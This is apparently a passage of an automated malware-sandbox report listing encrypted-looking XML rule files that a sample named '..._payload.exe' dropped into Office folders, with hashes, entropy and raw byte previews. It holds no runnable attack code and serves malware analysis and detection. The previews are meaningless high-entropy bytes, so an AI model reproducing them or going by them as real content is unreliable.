                                                                                                                                                                      SHA-512:BDD2110BDB854487F1244748B400E85CDF595AB4EEEF64F7CAF5576D5BC6C4BDB034E995E66E8C194CC0E2C2DA9027542619C94CBB407E06028B1AA536CF0D98
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.'.5.S8.=..~w&......{.I....n.Eh...9.. 5.......&67n6w(.......K4...x....DN....s...Dz.x{..z.....&`$).B.M.|s...#..={.....k...i.....!g.S&.....M.V.l....W........XP.*.....0P}.........).*.......$..UuV..1...<.._..K{.H....5...~~n.hI.a.j\..x].P..x3R...N.....u#.t.g0..2..........9m.x.6s...[.C/oR........J.h.}....z.1'f..$6...&....~.U.^.....k...0.s...3')...%D...f.|]..=."y..KLD..zb....9.e2v.......C..."..o...R.r.N.v.i;._...{\i.A.+=.E..W..Q.#Bj.m.Pi.*#.IYg{......`1.v..]i.ZI...Gon.....T$...6...D.!}!K....O.*H.R{...:.f.....wQ^7.0...X.z..iHu*y.j..tQ..;.c..C.8`.!...d ...t.......H......v.....C#_v..u&E..5.s7...f-...<../@Sd.#M...oq...TB...?.,9...>..g..p.C.~..WD..zma..,,[..5lbQaa..h..(k..5.\.<.8..=.k.9.._....>@.A.....f....4.........T8.M.5.4...%?ulEh...L6..Z.....2..........L... ...<..~....5..I.$........d...G..'.Ll...k..g.g.@.8W.....cJ.hm..?!...u.4.]r..'.>.{c }..%*.>......?Y.R...&.Bp......C{.-..3.-...ac.f.`x.,...3...<./..|;lQj.l.=.&.`.........1,.:OB.6.6.8......4...q.....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68015v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1197
                                                                                                                                                                      Entropy (8bit):7.827412310031002
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:8VcAdhPLaHnOZpkvwlSir71UYoAuALfi+n/RBz0fV2bD:8VcWPLIipBl171UYoAuun/RBXD
                                                                                                                                                                      MD5:37B1A834B3D9B12236E99F53CFE4929F
                                                                                                                                                                      SHA1:B2C96AB61A999ED78751402632270E808F29C4CB
                                                                                                                                                                      SHA-256:7D9B55F2B03B4409AD823AD651E890CE75B3E6667DC9065F9770A9E49526BA90
                                                                                                                                                                      SHA-512:EDA278E41C9773E1A253539A126F2F23359A0853F422DF73B34A04768366E49B13BBADF5A0252DC42EC2563C6E4AB626F2091F04C34AE78D845B0F186DD57445
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..&t....}.Ba4m;...L6.DK.E..P.J...3m.-....!MY.j.P..[.zo../..Z}!p\......?xu/.@..S*...0..m.'p......f.;....nf...[........k_D.?5..2isi.....V.m..p.[...7.b.........[.....b..e...p...m@".o.......~t.....Qli..+x....}...........&...\g......5..+CH.O....F..b...P..*....:{{...J"&@:.....7.*...@.a$`...l.|.1......^.Mi........;u.....*.Ige..Te.j.nQ.W.T...x.o....%......0..F;.w..Y..42TK.>.*O.[8....r..U.qZ..p..(..8.@Y.}.VaO..d.....0...Km........W=#W.R.?...*.T..4.....rV...pM...K.p...1..k.....%..G.:|.s.]#......%.....6..{...>...".Ju.hRA$.|.o..+...2.K....#...B...!..v.......b..+~...~._L....[.4.Bx..R. b...|.o.MM9.a.N........(@..^g+.X.0.....7..5.v.G>.:U.w.......g.....t..$.y2.[8*....l.hX..Zx!.:..FK ..2.2M*......P+yo.2........._.U.......vX..=CJ.vSe%....}.S.....\....8..'vM`,...sC.kE.1,..Nz.$.}.q$..*......[........".l...zs..4f..&{Bdd=q|yY.d!..l.kP..w.?_5;.\..J^.Z..(...e.....N.]i^1.<dmr..K.?>...X~....4"im.:1...z..*w...!b..s.U.,...7....a..._B..X..Z...s..,...>.>t@4...Y.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68016v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1004
                                                                                                                                                                      Entropy (8bit):7.8032606454220845
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:4sKBaNjS2BF4I78SVQJg0a9GojQsv2Hi82bD:4sKBaNSOFFAS6JHaHjz2CPD
                                                                                                                                                                      MD5:BB12AE6E69F46A6A706B7F6F841C502D
                                                                                                                                                                      SHA1:A8A7BEF3D782F768E6E8A93173040A006A257F20
                                                                                                                                                                      SHA-256:0B2A51EFE8B2B72743452847D9AEB703EAA442AE69D4BED9456422CFFE88665C
                                                                                                                                                                      SHA-512:9AC1A99DC844E21A4049315E503DE4566DE975CB7033FDB57699977010388C7BB132A8A8EFC3194B0035077BEEA83D22BD085C4C4902E2705823F8EB251908CC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..r...x..."..Y......0>..?K.[@.%.c.6Q......u......]..A.<.?..oq...<;R...(0..x..u.z.-.<...Su.............F.l.....T.#N.G.C....R>%.x..T.{.|..1NMm.T%F..Y..h..O).......zo..j..`).'.__......q.1.....S.n..x..#...n..q|;/T.5x..;..m.y...gjSZ..].O...>#:......t='".8j.[._.5......3.....,..*.CXg....[.1|...W....]......'mq......2..s.^..Pzy..L.F...Y...Y..t-hO.6.62.....-.e+.$..e^..0n......=.F.....n.".f._ER.,J.......J....^F.B0.....v..).2-.j..>.j|..i......53..B.y.[.q.-k.q.y..`$.@.d..g.". cZ..%,.s~k97q.m....>.-...7.)mS .?..b.^j..m.'A.{....?..'...9..Wu...oz......~.&8.[k.FW.B.hfE.o.......P...9vi...<w._,.b.]uX.4....O...`1AF..vL.W.r.+.a.....r".8......H....{......*@|...&.\l.\.u.pG4xLT.8.]9<...85s..&./w.v....q..u.s.Xz).AG.L..&....(oUi...0N.....}...2W..8.>...3.L...8^.........5n..)....+...jq..G.E...|..P..T.........&S......b.+.....$..x...'.8..E.:k...~....i!|5U.m....!......Zc4w8t..t..`.S..K.(fX(....IA^..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68017v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1186
                                                                                                                                                                      Entropy (8bit):7.826094821884817
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:m9KfQtAdVXuW0ZIvx7M/1yf6OqJmyM3SdEoVm9ZCc8oWrSJuVT2bD:eK4tgVXuW0Y7MNyCOqYniCZJ8TMuVAD
                                                                                                                                                                      MD5:3744044F289450156D81C9685304EAF1
                                                                                                                                                                      SHA1:A4E608FA295ED469D10F43BBF7ACDD0087154922
                                                                                                                                                                      SHA-256:51AA50BD541329948A9DFF8CCE23FDDFBD28772DE8CA7B5393B6163362434F8D
                                                                                                                                                                      SHA-512:4938B0DD52A399254415752D068AC7D43A172DB1C89C5BCE78B3877390DBE222723F4B36565D3B25FAFDDA4BE0DCEC2D7FCF518FB82CD16C19A871A87F1AF121
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...^Cyj..R. =+QV..t..e.w3:.v."...Y...g...Yjq>.DJ1N..k`...U3..7&R....&...z....J..Uq....V...........P..kqc......=..K.H..T....~Q..^.>..\`.....c&|..U....Qz.c.v..40....q..C...BC.<.e...^8.&.5.3T..d..B9l.`...)l...\5...oZ~.\+Z#D..Tq..'V.QX~S...)3...C ..FE..a.W)...,...O...z..|eP.G%.N..7)r........S_8.........cK..g-.-..l..[...K..4.|.=S%....^..J.TL/.\.1...64.,.T.........c.[.H]...|y.8.....^...21"..r..K....O....c..w..z.{.|.i...W..yu....!.J.'..z.m......j..Y.8......u.(.....f.......`.|.*n.[^_%$....{)r.C..b)v.TB..K......I....7...]......vD..uL&....l:>.)..x....c...b..$..^..Z.X.>N..i.....W..n..}.6.3n..5....i......u.>..V[-`.......>...@8.#..Z.d...~%.....6.O.}..].*5..4J.y...:]._...o..0e../#......Wf8U...G..=.h..,.nTb.(...E.....Uj.W.[...T&.......=(....Y.....u.N.j..!.P0.A..8[.o+..8...x..v$8..K./..O..M.......=.p.g.M..N..j.+W..M.Q`.gCLXT.._..N.....Xl]..S/"-Og...>.m4....D...#..<.nRL.X.....D..<%..].].'..-.Y.U..N[.I.m#Ut.......k.}ie.J...z....(1.."..k.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68018v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1291
                                                                                                                                                                      Entropy (8bit):7.845925459189664
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:vIDfFJNNjIL5p1h1tpNrY9bxERxaj4BPG3qhR72aCmH/veQj3MQxsm2w+2bD:KfFyL5B7A9bxSxaMVG3q1CMveQjaelD
                                                                                                                                                                      MD5:E9D4E62747756C47125B0424E8C8CE2A
                                                                                                                                                                      SHA1:2C0F62CDD5C2C7E063F1BC7E1F169F0A93139C9C
                                                                                                                                                                      SHA-256:EF2F3A07D2F4346672A7E155669F047817A6E1727DF3BBF5A302D23DCFEF3933
                                                                                                                                                                      SHA-512:60E8B281DEA63E545C7C8D05E8BA64C70D480A4BF2493F8A4C4B55BF07B407EF3F6902C722B86C347EAAF6F3B5FFF6524260910147F6038FA2260C401450C7F5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..dj..`wT...#.....F?.}.P......s..Q..(m=.sTH.3...~.m.^......"_k!Yq....P.c.....C..R.........c......!>...7...;s..@......P..*E....,.?...I.....N/.bV&c..G.A#..l...V3....<.?.a!.Wn.h.e.j........7*. .v&..k...-&.t...*..KI.._.q#.AZ.O.@.Y..H...\.....wEI...c..@?...=.....N.Iu@L..B,....s..(8..%#d..*...}a0....,....'..z.....b....[.<B7...>,.Hy.Ja4[~.........z..QA.....*02.H.u`C.`.&......A.}(.>e.b...ZC..MW*..H.H.\8.-....-H...^...~]yG.G2....i...!G@Y.- ..K|.4.m!o...I%.....HG,.$...A*GDJ.?*..*5.z..!.. ..b....Jd-c......&.2..:...&.....PE.S.j..(th...xa...t......#..{M...%;...8.>".....lQ......).V..6TQ.5..........F..q.j.C..........$/...y.3R....."....N<."E..vMz.:I$.&.%......K.!=]...Q....s...........,..l_.CS..A:d....B.`...{..{.h....a..=j3w3...V...b7[p....@k.....B.vK@....h_...D.)c.....J...J...Gb+5i.T5>iZ.....$......w.....!........>7_..y...<.j:..;...W.P.`w...s.a.;_+F..P.T.&.\..#"..\....D*z.....r....P0reP.v...rf......KGf<...*...........N..C..)S@Y@8P9l[I..$}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68019v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1737
                                                                                                                                                                      Entropy (8bit):7.876561244971225
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:HXufMR/C3Jvsx/++y3Q+eYdN7PSlHkBwqSRSESsRBKn9hIcHR51yFP2bD:H+fMNC3Jg/+fe07PSD1RShOmFHRDPD
                                                                                                                                                                      MD5:9AFCA81C6F8553F2FA7ABC189B31BC08
                                                                                                                                                                      SHA1:62AEEA991A3DB3E37663E8E2EFCEC81F92F7BF5B
                                                                                                                                                                      SHA-256:BD2E27B7469E9B1919F8FCE5F564D7587D5D7E36B4F0A521A0E81B9E4CC0320E
                                                                                                                                                                      SHA-512:C0948CE0DDAC202971FEB02B990DF73A45E2224484AA2608BA05BB16660238FB0FB19FDC661E0E32784EB7D7A64404C7DDD9799240ABCDFCD8F3BFD5CC39450F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlA..$A.....e. .H.K%....c......]...<.+'.^.'...0.C6..Ba..0Ur.V....f.p.M..f?...e.Y.<..M..WS..G.4C+r..Z...&..P......iN_.."^p. M.....e@R...;,.-...[....([.....2J.....i}.3...)..:z.Ly2G....m.LP!dw/....].x.S...J%...E".?.r..s...............*..|..g..h....7.b.Dk....._...qY:....B^=.v...kEt@..Z.........>.Ew...Q7..V..?..Si.O..y.W[g.Z.8.!.o...rX.c.st=O.>...(.e.d,.TVL>}3...%.x.}...3.^._.0.=...{...:.....3.5;.z............BW...<..i....}\....M..`*W...N.$..q....9i..h..s.k+....3.B..'..p.T(k'#"...c.G..em../.n.~..\N......N.P..5..n."..3*E.$jE(.."P..p+q7/..\...x.*.7..3.3F.:*..;..8".CG..=3lQ!.|.b...W.g +].Q...b.........<..S......=a.R...|.<.K..0....I..~n[.9_=..jE..#...r....k..x............A..?.G.5w...'....Z~i...P...C.P.......'.N$....]....~A../..-.......X.6B8y....OF..G..l.....^.9.....J].. a..F.s...]......_-.Co....V..a..D7.\.....6..s..r.d..%.....d5f.mt.F...8.#....~..*.!.6.h.a..$B....:..GV..E{Oi...ZqM...M.k.....My..{a.,.ed1,.lm..K..=?..c...q._f4[Ew.o.E.P..5.X.7...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68020v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1354
                                                                                                                                                                      Entropy (8bit):7.849159962871554
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:u5HBgNQFe2/y8v3qiuBBCOzYySEulRn3/ogMdlFKPoPIef8uqyB0R0JiZ42bD:udSNAak3tIZuH3/otdrgPdyDJmrD
                                                                                                                                                                      MD5:D169D4F139A395FFCA6AC473E19B8FD0
                                                                                                                                                                      SHA1:D42AED102623FC5A17F5840B733C849602E87CFE
                                                                                                                                                                      SHA-256:4E9AB32153A8FF7E098C500D721409659C93AF527D23BE2A1673F41AB0A55116
                                                                                                                                                                      SHA-512:616B9D88C1A5B99C0F5B159959D430D266F9063BB018341033EEBF564C604F0F4F3DEDC2344C95D80C2034B47FF90FEC4D2F0E77D51F1F67EFA7B86ABF861F37
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.....~yJ.W..d.......r..hgx..H......G.....1.g......3/...8....W....`C*.\..H.?..........w.X......&..~9..'.4\.....!Uz.rbn.a...le.X...'h..c..Q6V%..xS[..5..+.bH^:.$YV#.rM.h.g..<U.%x.p....x.-V..O...J.....8.............=..Y.q..P..z..M~A........#..T..K....B.Of.4.......k..5.V...$....e#Xa.v.1]..q%..G.!.{./T..G.KQ..2.rn.$.A{3..0^A..`..^...9....-...........6...;Sm(..hh.Z..*......0|...#..x...,.n.W:S]2.Ol..D...r.]U.....xM...2.5r.Y.NTN3A...Q..q5{Fu....e\...j\#..\)...D<_..@"?...k..q.r.8c...Ep~.*.Sf.....-.y._L.5....C<_.w.].*..<uq..zY1...,.A.}../t.K .......k.T...t.N...d.!\.^R....04..g......Q...C..Fv...^.....}p.=.[... .........{.U+=..H..aI.^j..)O..k..Cz.p...^F...2...&.)Kb....(@W...q.'{.m......V{...g~..M.B..MQS_gv..U...X.*...E...Jk.*...'+.#....b.BO:.F.I6n..4.5.I..@.3m.%..L{.9..'.P3.E...o.H..5.J.d._l'ecp@.V.........M>...O....>J..}i......."=.Ni'R0.N.../....<..bs..8&..gC.r........1}J...;:...Y.`...k.....*...&J4...G.g'.l..g.^.o..<.M....(.._........

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68022v8.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1864
                                                                                                                                                                      Entropy (8bit):7.892268464747033
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:QnoQTavbJ1tLtE2PBeEvDua1s+XD8CLS5o/oiwhHa5D:QnjgJ1tOaB9SWsto/jcq
                                                                                                                                                                      MD5:77C85ACB44E08963311BADE6DCA66552
                                                                                                                                                                      SHA1:DD47A0F06C5A025289989F88BFA86CF77B37DACE
                                                                                                                                                                      SHA-256:119EEB9849BC8D8FD80071656356DCC83D09BDBF834F27452986BE2150975D18
                                                                                                                                                                      SHA-512:C057A2A146A230B99A76A5CCDF9117C0F61A71DA0D83E7136E03034C1F240E0D885F2C0E8C0F781D91BA7C945C31A8393CCFC6DAD0BF6AD85B1FF249A79588BA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...OY.........<cd.....Mp0..{.,U.=}.O...J/e.m)......a.m`...N...rE9....PK..Z[y.....!y`8...:..H.{K.......:$....,..S...4.Z.....n)...47...+..Y..hC..Qe:....5..b...7x>.....J..r.!..#@.9............IcXRM7BO^..)v..9Q2!.ui.JO....'..7.._..W6D..E3lI.5?/.....-....k.....q.$.pZn..q......?......z..8A...:.V..[#.n\..Gs.S..~.4.......:..o..eH8...{.B.........V...._..q.......u...k.)..o.:..S...6.'......m.....K....K...ZE...,..............v.U...I...t+.....'...9..$..x.. .D.q.L..1-..'....j...|.qu...Y..%O..\.......;a0}..........|.../7.s%....k.#... .s....`......`.~?...;@Pc..&.6w!.xe... z.#....^.....<...qd.!..:....h.9... .5}\s.....e..,...,?n.?..5W..m...4.....W......r..d..{x.....-.Gfm....7.:....(.~..~...S ...dmQ......L..0.>-.\.{..!.G...oKQ/.N..Z...e.t-.;>.(xr./.O.?...>?.............6Z..+.....h.u.q,..9p.r......4.$...=W...p..(,..p..Y0.3...!....h~xE..B.(...).g...R..,g2j.n...3.}n y`7.j,..9S.V.8....%4PI3.....Z.#....=.e....O_\.=.l<.u..-I..2....otf.y..QB.'....*......%,.9D

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68023v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1509
                                                                                                                                                                      Entropy (8bit):7.8787761108104295
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:8PT58MTVw4Qz0mfTE18+dUS8ZOyYPrulMVuL69b2FxTPzUcmLtn/S0d1xJhxpaI3:872MZNQhS8+dUlZOyVmO69b2FpWpnq0t
                                                                                                                                                                      MD5:38182CD1596654BD3FAC63D27B64F3DD
                                                                                                                                                                      SHA1:5ECCBB56602D87545C3B910BE65ECD485126ECE9
                                                                                                                                                                      SHA-256:C1F0B1930841A056E0F4D761758AAEC52D3261C8AF1ADE7C2142CFFF9299C8BD
                                                                                                                                                                      SHA-512:15305395CA23386640E46833C55E18AFBD286F600E4BA9AD44D935FB54E2CF89F59D5D85725FFE6304752AAF9A0BD93507BEDBC3849C4AB3ADCDBED685F6D991
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml......(]....:.cEb..?d...``v.[+....qv.........miX..v.....V...).\.P.].Ju.....8.n.....q.n.u.yM.....v[4.QQ...|^.c)"......?..D ....B.YI......M6z^.E5m2E..q.n*r..8.A.6(oP.m@P.\.+ll6~.y..*...7..T...N*..O.).*....p).(.&.F.p#.w.....j..D....{.Y.v7J......7.......H0..\.w..*.]....7y.).M..X.....:.....%>.g._g.>....B.......~...&fX.:,....u...9.4W..?/}V.Rt.Y..|P.S!3.'.7u..l<......j.0.U.,.pChm..2[...Tu..W..!....;...?.FEn.k.7M.......y.....A...u...:.d....Y,....Z(..w.N_rz`.......0.....$.A...4.KjH....uNd|..I..Z...x?..........B..M"....j.q.I....}..nF...f..Q.D......d...9.M.L...........P.Y...721T.>...J<!_...dXc.1#.....K...KJkM..KM.s.'..`|..X_XgSdQD...0...'....I=...|....!...6..h.I..j6.J..SS...{.....S.(X..l..].1...5....1X.bF.8.$..E....!....! .`v.r.LV.K4.,.S..X....v....m......|...yN.d.F.#..Q......{....{....C.6v..0...p..:.:.J&w#.s...an.<.I.(..>DJ..}9*]g.c..g<...G5..+..Wv...;....R..W......6r....*..h.sR..n./..1H...r.C....|.....z.>(~.*...C.L.....RA.>..A...k")

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700100v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1691
                                                                                                                                                                      Entropy (8bit):7.884691273905199
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:w9TGY2UkC83D2Lu0qFeNGcPfZlDPUIXQyfmoP8OQenCQ14fjhpuJYcTmtD2qT4eC:w0Y2UkjiLPvP9FO8tLerqKuD
                                                                                                                                                                      MD5:813795BE4EC82F48EA65CBFBD91F6E9B
                                                                                                                                                                      SHA1:F0C0C0C7AB1183E6DDA05C8B06FC7F87B9C4A0E1
                                                                                                                                                                      SHA-256:D8D8F3920A08ACA79E3F4B967782037C6830C845304CB3A842444C6EE197FCA4
                                                                                                                                                                      SHA-512:2CDA6D3259588F2FA877E08A4F7CF9BEFD3F938D82084864086D16FC9B1861DBA5F5A80B0308244C655CF45B9D3DE663453208EA3779B978DA20C9ECEC1C22E6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.....|....6.V.T....UU^."...c.x.[p...}Hut.V/.@(..o...F.f4.)......R.Z.3 ...?.m...C...<.s....4'.\........y..D.8.....3%.f...&).$oT.M.z.+......L.U..;..l.........Ys..h.$.m...'......_O..MM..?.t..ax....uF......H.&.(.A.`.].\=n...aA.93.5c.in.lE..,.I.....v.......S.t.T...SS.f.6.XK....../....@..5;..l.....u.]#.WQ......p+K... .m..z.O. ...:.z.`.7..2......"....=....4Lb...J.f..F.`..D..0J.q^".{u..B5.u3.z....&.E{..w....x..7vp....W.8...0_...+.........n.a.mEJ...K\...j.3"..:..}p......>..x...9N......c.2../....?..9..V.....f..n0C.<V......J.x.2%j.X5......i.....(R..guV..#..X..$V.$.......2(G.U...]D....."I......sq8z..u|..m.J..?dW..~.J.c]+.Q..x.../K4.Y...=Ot.....xH...^.....j.NY.y~.M...u....:.k...oN....4...y........x..tc....0'=!. .?..U.$6%8].xj...q..+....K4..."db.G.r.t..B.2G..*q.B!........4.....K..W..I...O+....<n..B..#3..Tm<.6#i...ue>sn..B..J...)....y`.4..H....Dt.T..K.}.Kp...e...#1.H.5.../....X..irf.K....'...h...v.1m.}"5..B......Wtw.f........Ug.&k..-"A..A.|.KD.g ...Wrs.5$.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700101v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1728
                                                                                                                                                                      Entropy (8bit):7.884645617951101
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:YZuWolA3d389gfwe3gFRE9z65NXW1L8yylujvHFnMgD:YeEds93AgF6G5NXW1L8xEj/x
                                                                                                                                                                      MD5:3CC434272D0531EA80EE0EAA2D861527
                                                                                                                                                                      SHA1:DF6969EF3E27DE29376B1594F73C74A8AA9A716E
                                                                                                                                                                      SHA-256:1987903EC7632DEB4585FD5162BA72EC627DF1B5B44EBF3EDBDD63F6BB1F9ECA
                                                                                                                                                                      SHA-512:A531DBD25C756F2DAF7B1C26762A61800E2342022DE5ED9EB04887F1DA9B51BFE808CEB75BA03F6AC0D21F3BD239ABAD1162F8D8656107D1101FF2B5E7432D3E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..*!...I..._.MQ..:].Y...oD........H.^...T.)u."....t...R.I.H........Rf..R.....C...L...4...2^OXND/L.4.`..cN..a).r.......h..S..e.f..q.U.?A[..6../.;H..{:.I..p.P.|..K.s........}.k..(N..e1\...3?..R,E.3.'K..(8.Tpf......a..Q.....P;CX7.w...a.B.......Y.!.A..._.........C/.14n.Xm?.,..B6.o.{..f.j1.K ..L.;]MGn.o.......8s...3;.-.T.K.]4.PQ.....ur..=K..g..+Z.,......uG?Z....[.JU...A...0..5.|x^..'.f.4..$.....@....4.lZ.d.....f.p.U..b...~.E.9...=A...a7...+..L.V.....b...D..=..I.<I..|uy.G.$.x.<R.S,*.4.1..5.^....F|....-*... ...|&......PId.........qK.`lV0...._..Rl.b-.....-.....w.i..u...9..'z..}.......:.N4.&.u........(.$V..kvB.q....N....].!....t.V.........1..p....L.....RQ.2.jw...3k:..A....`...R..m.:.....}n.A.....!.7-.....9.k.ANo..=.m.M1.u..AIK.c..7......T?J.;X..#Xb9..U.m...D..$.$-.X.2..Ob..v....\xS_.W:.Rk.m)[$>0......_.C...bvWY.4Hp.z..h...@.zi)=....."..g..zT...l......0..T4...H...at.C.....^,>.6x.9`........Nm.8a.....C....f.ICg...%.J.-...on..sr..#(&,JK!...4.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700150v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1695
                                                                                                                                                                      Entropy (8bit):7.873626651280396
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:Tghmdr6PyHHiN9geszlcWGWNe3Pdw163XGD:T8qr62ZrBcSU/dU
                                                                                                                                                                      MD5:4E005E2C722251778828D3AE6D58AD88
                                                                                                                                                                      SHA1:AA50652CF69BE068F232BE165FC499222CF0BE14
                                                                                                                                                                      SHA-256:54B5F48113E5FF8D0903B65EDE695D08CB45A1AF7097028EF19DDD18824930B3
                                                                                                                                                                      SHA-512:3F6605B520751AF4032D3ABB9A34BF50EED798200376732F1812D421CA5089456C1E8A0A9025869FB92185FB763B249D510782BEBF0B4238221B8D114DA7E5AE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.....;>....g.s......16..U.Fy......P4... M..n.s...r......H'.....aT...!.f..y=...W.9.@H4......E..2%._k.OF7yI.p.....1qC.Se.....6...[..T_W1)5hq6....;..d.t...Un.......>C..%y...O.4u..n._.g..).%...}#,p{...".).n...M.V.jx........_...(!....@6.r.U1m..........76..Y{..gL.H..DM[K...,.Z.8Pl...F{.ro...+...3.JO..].....<bNEq..58O....7.p......7*.&.... ..Me...i..O...eR.+........2...(..18.....o......_c.... ..@6......D..yh.O.v.=.O....M...I.l..DQ.@..>.V.@T.]4...'h.{K.-...Un...L..0).O7+....V.X.....}9...<a..)O...+^.*|.x...G.)..g.i..m..e.U..m...q..cFr........F.h.d..s.....'....D..T.z.M.._.A..I..Z/..5.,...........xqE_....q.{.7@.f[.V..........m...P......y..... ...V[2..Y.T.=..|.{..,.G..z4.C...........%3.!..4..Z.(..]$.#.mD&-.X.0-.].......qV.Q..nHk.#S..U-.F.P........F..3.<B..... u.Y.........)....B....Z.Oi...H.g;.a.k=..,...YiX%.e.......,...I.e.ve..3..~}?LV.3..^P....6t..si.MMj....|...V..C:."&...B....._.Vo..J...`..5.W}..k....{.]..s..i.C.i.!0.....L.\.......4...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700151v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1732
                                                                                                                                                                      Entropy (8bit):7.8810963156873575
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:zq/vfUM+QWMsKCXqL+x+E5sJRpLFQ2q6j9DDQAD:zq3fUM+QWMrMfs5OYjJDQc
                                                                                                                                                                      MD5:FFDCEE26E07E5212CC1396DC2653386B
